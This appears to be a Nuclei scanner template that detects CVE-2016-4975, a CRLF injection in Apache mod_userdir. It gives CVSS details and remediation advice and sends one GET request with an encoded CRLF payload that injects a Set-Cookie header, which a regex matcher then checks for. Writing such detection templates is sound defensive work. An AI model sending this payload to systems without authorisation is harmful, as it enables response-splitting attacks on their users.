id: CVE-2016-4975 info: name: Apache mod_userdir CRLF injection author: melbadry9,nadino,xElkomy severity: medium description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. reference: - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-4975 cwe-id: CWE-93 remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. tags: cve,cve2016,crlf,generic,apache requests: - method: GET path: - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" matchers: - type: regex part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' # Enhanced by cs on 2022/02/14